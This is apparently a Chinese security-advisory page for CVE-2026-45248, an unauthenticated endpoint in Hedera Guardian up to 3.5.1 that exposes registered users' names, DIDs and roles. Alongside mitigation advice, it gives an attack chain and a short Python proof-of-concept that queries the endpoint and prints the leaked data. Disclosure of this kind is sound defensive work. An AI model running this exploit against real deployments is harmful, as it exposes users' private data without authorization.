CVE-2026-45248 CVSS 5.3 中危

CVE-2026-45248 Hedera Guardian认证绕过漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-45248

漏洞类型

认证绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Hedera Guardian

漏洞概述

Hedera Guardian 3.5.1及之前版本存在一个严重的认证绕过漏洞。该漏洞位于`/api/v1/demo/registered-users`端点，由于缺乏有效的身份验证机制，未经授权的攻击者可以直接访问该接口。成功利用此漏洞可导致系统内所有注册用户的敏感信息泄露，包括但不限于用户名、Hedera DIDs、系统角色及策略分配等关键数据，严重威胁用户隐私安全。

技术细节

该漏洞的根本原因是Hedera Guardian应用程序在特定API端点上未能正确实施强制访问控制。具体来说，`GET /api/v1/demo/registered-users`接口被设计用于返回注册用户列表，但开发人员在配置路由时遗漏了身份验证中间件或权限校验逻辑。这使得攻击者能够绕过正常的登录流程，直接构造HTTP GET请求发送至目标服务器。由于CVSS向量显示无需用户交互（UI:N）且攻击复杂度低（AC:L），攻击者可利用自动化工具批量扫描受影响系统。一旦请求成功，服务器将以JSON或其他格式返回包含用户名、Hedera去中心化身份标识（DID）、父注册表DID、系统角色以及策略角色分配等敏感信息的完整数据集，导致信息直接泄露。

攻击链分析

STEP 1

侦察

攻击者识别出运行Hedera Guardian 3.5.1及以下版本的目标系统。

STEP 2

漏洞利用

攻击者向`/api/v1/demo/registered-users`端点发送未经认证的HTTP GET请求。

STEP 3

信息泄露

服务器响应请求，返回系统中所有注册用户的敏感信息（用户名、DID、角色等）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url):
    """
    PoC for CVE-2026-45248
    Attempts to retrieve sensitive user info from the unauthenticated endpoint.
    """
    endpoint = "/api/v1/demo/registered-users"
    full_url = f"{target_url}{endpoint}"
    
    try:
        # Send request without authentication headers
        response = requests.get(full_url, timeout=10)
        
        if response.status_code == 200:
            print("[+] Vulnerability confirmed! Sensitive data retrieved:")
            print(response.text)
        else:
            print(f"[-] Target returned status code: {response.status_code}")
    except Exception as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target URL
    target = "http://localhost:8080"
    exploit(target)

影响范围

Hedera Guardian <= 3.5.1

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界防火墙（如WAF）上阻断对`/api/v1/demo/registered-users`路径的外部访问请求，或限制该端点仅允许受信任的内网IP地址访问，以降低敏感信息泄露的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表